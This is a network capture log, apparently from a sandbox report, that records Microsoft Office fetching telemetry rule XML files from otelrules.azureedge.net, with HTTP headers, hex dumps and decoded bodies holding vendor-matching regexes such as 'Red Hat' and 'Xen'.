                                            2024-11-18 20:16:49 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            91192.168.2.44984213.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:49 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:49 UTC470INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:49 GMT
                                            Content-Type: text/xml
                                            Content-Length: 416
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                            ETag: "0x8DC582BB5284CCE"
                                            x-ms-request-id: 6b1971c7-b01e-0053-1140-36cdf8000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201649Z-1866b5c5fbbfkdfghC1DFW4sv400000005e000000000cmvy
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:49 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            92192.168.2.44984313.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:49 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:49 UTC470INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:49 GMT
                                            Content-Type: text/xml
                                            Content-Length: 472
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                            ETag: "0x8DC582B91EAD002"
                                            x-ms-request-id: 200f6d4e-701e-003e-2fb8-3779b3000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201649Z-16547b76f7fl5zvnhC1DFWtk9g00000004ng00000000u3e7
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:49 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            93192.168.2.44984413.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:49 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:49 UTC491INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:49 GMT
                                            Content-Type: text/xml
                                            Content-Length: 432
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                            ETag: "0x8DC582BAABA2A10"
                                            x-ms-request-id: d0d1667b-a01e-000d-1d09-37d1ea000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201649Z-16547b76f7f6892shC1DFWawd0000000037000000000qd1t
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache-Info: L1_T2
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:49 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            94192.168.2.44984513.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:50 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:50 UTC470INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:50 GMT
                                            Content-Type: text/xml
                                            Content-Length: 475
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                            ETag: "0x8DC582BBA740822"
                                            x-ms-request-id: 90f07e84-d01e-0028-2a09-377896000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201650Z-16547b76f7fhv4d5hC1DFW7h0n00000004k000000000wzy7
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:50 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            95192.168.2.44984613.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:50 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:50 UTC470INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:50 GMT
                                            Content-Type: text/xml
                                            Content-Length: 427
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                            ETag: "0x8DC582BB464F255"
                                            x-ms-request-id: 477f9298-401e-0029-0942-389b43000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201650Z-164f84587bfghdt4hC1DFWu5nn000000061g00000000nx9y
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:50 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            96192.168.2.44984713.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:50 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:50 UTC491INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:50 GMT
                                            Content-Type: text/xml
                                            Content-Length: 474
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                            ETag: "0x8DC582BA4037B0D"
                                            x-ms-request-id: 32d33ebf-401e-0048-7d9e-370409000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201650Z-16547b76f7f2b5qzhC1DFWeag400000004c000000000yw4g
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache-Info: L1_T2
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:50 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            97192.168.2.44984813.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:50 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:50 UTC470INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:50 GMT
                                            Content-Type: text/xml
                                            Content-Length: 419
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                            ETag: "0x8DC582BA6CF78C8"
                                            x-ms-request-id: fa98855d-501e-0064-4540-361f54000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201650Z-16547b76f7fqqjnnhC1DFWxv7400000004eg0000000115e6
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:50 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            98192.168.2.44984913.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:50 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:50 UTC491INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:50 GMT
                                            Content-Type: text/xml
                                            Content-Length: 472
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                            ETag: "0x8DC582B984BF177"
                                            x-ms-request-id: 598b0884-401e-005b-48af-369c0c000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201650Z-16547b76f7f9s8x7hC1DFWywrg0000000640000000007tsf
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache-Info: L1_T2
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:50 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            99192.168.2.44985013.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:51 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:51 UTC470INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:51 GMT
                                            Content-Type: text/xml
                                            Content-Length: 405
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                            ETag: "0x8DC582B942B6AFF"
                                            x-ms-request-id: dfb03e2b-001e-00ad-2bc4-37554b000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201651Z-16547b76f7fl5zvnhC1DFWtk9g00000004q000000000hshp
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:51 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            100192.168.2.44985213.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:51 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:51 UTC491INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:51 GMT
                                            Content-Type: text/xml
                                            Content-Length: 174
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                            ETag: "0x8DC582B91D80E15"
                                            x-ms-request-id: 67879f82-a01e-000d-0dd2-37d1ea000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201651Z-16547b76f7fd77jrhC1DFWfwq0000000031g00000000515e
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache-Info: L1_T2
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:51 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            101192.168.2.44985113.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:51 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:51 UTC470INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:51 GMT
                                            Content-Type: text/xml
                                            Content-Length: 468
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                            ETag: "0x8DC582BBA642BF4"
                                            x-ms-request-id: 78f9d12a-601e-0070-27c4-37a0c9000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201651Z-1866b5c5fbblmztchC1DFWs6v400000004yg000000002x37
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:51 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
